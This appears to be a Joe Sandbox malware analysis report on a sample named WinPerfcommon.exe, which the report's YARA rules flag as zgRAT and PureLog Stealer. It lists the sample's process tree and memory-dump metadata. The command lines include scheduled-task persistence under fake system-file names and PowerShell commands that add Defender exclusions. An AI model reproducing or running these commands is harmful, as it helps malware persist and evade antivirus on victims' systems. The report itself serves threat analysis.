                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 5 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:10:20:01
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 10 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:20
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "WinPerfcommon" /sc ONLOGON /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:21
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:22
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:10:20:02
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Imagebase:0xda0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
• Detection: 63%, ReversingLabs
Has exited:true

Target ID:24
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:26
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:32
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:10:20:02
Start date:11/01/2025
Path:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
Wow64 process (32bit):false
Commandline:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
Imagebase:0x1d0000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:10:20:02
Start date:11/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:36
Start time:10:20:02
Start date:11/01/2025
Path:C:\Recovery\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Recovery\SgrmBroker.exe
Imagebase:0xdf0000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SgrmBroker.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 63%, ReversingLabs
Has exited:true

Target ID:37
Start time:10:20:03
Start date:11/01/2025
Path:C:\Recovery\SgrmBroker.exe
Wow64 process (32bit):false
Commandline:C:\Recovery\SgrmBroker.exe
Imagebase:0xc30000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:10:20:03
Start date:11/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
Imagebase:0x7ff640170000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:10:20:03
Start date:11/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:10:20:03
Start date:11/01/2025
Path:C:\Program Files\Adobe\StartMenuExperienceHost.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Adobe\StartMenuExperienceHost.exe"
Imagebase:0x950000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 63%, ReversingLabs
Has exited:true

Target ID:41
Start time:10:20:03
Start date:11/01/2025
Path:C:\Program Files\Adobe\StartMenuExperienceHost.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Adobe\StartMenuExperienceHost.exe"
Imagebase:0xc40000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:10:20:03
Start date:11/01/2025
Path:C:\Recovery\SystemSettings.exe
Wow64 process (32bit):false
Commandline:C:\Recovery\SystemSettings.exe
Imagebase:0x820000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\SystemSettings.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 63%, ReversingLabs
Has exited:true

Target ID:43
Start time:10:20:03
Start date:11/01/2025
Path:C:\Recovery\SystemSettings.exe
Wow64 process (32bit):false
Commandline:C:\Recovery\SystemSettings.exe
Imagebase:0xd40000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:10:20:03
Start date:11/01/2025
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff6a0070000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:10:20:03
Start date:11/01/2025
Path:C:\Users\user\Desktop\WinPerfcommon.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\Desktop\WinPerfcommon.exe
Imagebase:0x3c0000
File size:2'020'864 bytes
MD5 hash:6B9554367A439D39A00A0DFF9A08B123
Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:46
                                                                                    Start time:10:20:04
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\w32tm.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                    Imagebase:0x7ff72b240000
                                                                                    File size:108'032 bytes
                                                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:47
                                                                                    Start time:10:20:06
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    Imagebase:0xdf0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:48
                                                                                    Start time:10:20:09
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:49
                                                                                    Start time:10:20:09
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"
                                                                                    Imagebase:0xc30000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:50
                                                                                    Start time:10:20:12
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Program Files\Adobe\StartMenuExperienceHost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\StartMenuExperienceHost.exe"
                                                                                    Imagebase:0x9c0000
                                                                                    File size:2'020'864 bytes
                                                                                    MD5 hash:6B9554367A439D39A00A0DFF9A08B123
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:51
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bCL7Nxg3GW.bat"
                                                                                    Imagebase:0x7ff640170000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:52
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:53
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:chcp 65001
                                                                                    Imagebase:0x7ff6a0070000
                                                                                    File size:14'848 bytes
                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:54
                                                                                    Start time:10:20:13
                                                                                    Start date:11/01/2025
                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:ping -n 10 localhost
                                                                                    Imagebase:0x7ff69f250000
                                                                                    File size:22'528 bytes
                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Reset < >
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 5X_H
                                                                                      • API String ID: 0-3241812158
                                                                                      • Opcode ID: a9b198a3129d4e03689222bf082263645a5cfe498ea5bc612d19547e2ad5b5e0
                                                                                      • Instruction ID: 8b5d17cd29e78b16777fb91e38361f74131b981968f282e0e977d4d0f31b24ab
                                                                                      • Opcode Fuzzy Hash: a9b198a3129d4e03689222bf082263645a5cfe498ea5bc612d19547e2ad5b5e0
                                                                                      • Instruction Fuzzy Hash: 6291BE75A29A8E4FE759DF6C8865BF87FE0EF9A310F0101BED049D72E6DA7818118740
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: acc977649e782da8704b1d6c3f12aeeff76a1e61003ac37f3486a4f18a8cd29b
                                                                                      • Instruction ID: d9e1638b7d94809236e4a8dc4b426bad31b2f399d47d80f7ed0403fda45b3cdd
                                                                                      • Opcode Fuzzy Hash: acc977649e782da8704b1d6c3f12aeeff76a1e61003ac37f3486a4f18a8cd29b
                                                                                      • Instruction Fuzzy Hash: 0551D276A28A8E8EE758CF6C84A5BFC7FE0EB9A354F5001BED049D63D5DBB914118340
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: c9$!k9$"s9
                                                                                      • API String ID: 0-3426396564
                                                                                      • Opcode ID: 563c74ca737d2503fe2dad733225739fee968199f9910b104847e2c06a0d5736
                                                                                      • Instruction ID: b7b2fd8a8326811c29516b8ba0701dd8e93976923d491ff017ab74a88e02f7ee
                                                                                      • Opcode Fuzzy Hash: 563c74ca737d2503fe2dad733225739fee968199f9910b104847e2c06a0d5736
                                                                                      • Instruction Fuzzy Hash: E0F07822329D4A8BC7016B7DF8500E47B40EB8B172BE501BBD044CB262E211182EC3D1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: U$U
                                                                                      • API String ID: 0-2145350036
                                                                                      • Opcode ID: c004cc232ee63f677e2a1fc9c9ac3d3cd815531d4018e2217fb592aed58fa309
                                                                                      • Instruction ID: 293aa643d620fc389cae274dd6c1ab3026d56790f800c5046102c92d0beb737a
                                                                                      • Opcode Fuzzy Hash: c004cc232ee63f677e2a1fc9c9ac3d3cd815531d4018e2217fb592aed58fa309
                                                                                      • Instruction Fuzzy Hash: D671C430F1E54E8EEB65DBB488A46BE7BA0EF45301F1501BAE01EEB1E5DE386941C701
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $W
                                                                                      • API String ID: 0-3287005699
                                                                                      • Opcode ID: 872b2076f8090c5520a2f262406781ba4754811f3708307cfdab87460461e2a7
                                                                                      • Instruction ID: bff66b623d1e410de9726b1b7514b9273417cba5718e334c2c8dae80c7a4e83d
                                                                                      • Opcode Fuzzy Hash: 872b2076f8090c5520a2f262406781ba4754811f3708307cfdab87460461e2a7
                                                                                      • Instruction Fuzzy Hash: 41516D71E0964E9FDB68DBA8C4605FDB7B1FF4A300F5141BED01AE7296CA382A41CB50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $W
                                                                                      • API String ID: 0-3287005699
                                                                                      • Opcode ID: cc2c241b174900b8bb33ef52bb54a46801af6613f90e138fd6bd1c30f1f0de4a
                                                                                      • Instruction ID: eb7da9b5ae2b5614275ffd151bf2c537ee69a4a23b0ac6ac21c2e21d623cfb7a
                                                                                      • Opcode Fuzzy Hash: cc2c241b174900b8bb33ef52bb54a46801af6613f90e138fd6bd1c30f1f0de4a
                                                                                      • Instruction Fuzzy Hash: 88515C31E0964F8FDB59DBA8C8645FDB7B1FF44300F5540BAD05AE7296CA386A01CB40
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: U
                                                                                      • API String ID: 0-3372436214
                                                                                      • Opcode ID: 705fd0df7c361d7660c7193fc065fd84bc3bd290713357cb9cea9844f0ccf67b
                                                                                      • Instruction ID: f2c106e6ed4f58dab50ff12d0a85b1c7bfb39b7a81d4d77ca04d7722d5f82108
                                                                                      • Opcode Fuzzy Hash: 705fd0df7c361d7660c7193fc065fd84bc3bd290713357cb9cea9844f0ccf67b
                                                                                      • Instruction Fuzzy Hash: 83F1E6306195599FEB68CF68C4E05B837A1FF46310F5551BDC85ECB69ACA38F981CB80
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: W
                                                                                      • API String ID: 0-655174618
                                                                                      • Opcode ID: 5a23a14a61dbeb60bd1e9354ec2dd6369f90e63092ecfcf40ce8a8475f00cbcf
                                                                                      • Instruction ID: 89f98c5530d07ed60e3e962cf30bcd2dd0a593e903c306bc7c7b62f9e7302033
                                                                                      • Opcode Fuzzy Hash: 5a23a14a61dbeb60bd1e9354ec2dd6369f90e63092ecfcf40ce8a8475f00cbcf
                                                                                      • Instruction Fuzzy Hash: C8E10330A0EB0E8FD378DB78D4A457977E1FF44300B1155BED4AEC76A2DA29B9428741
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
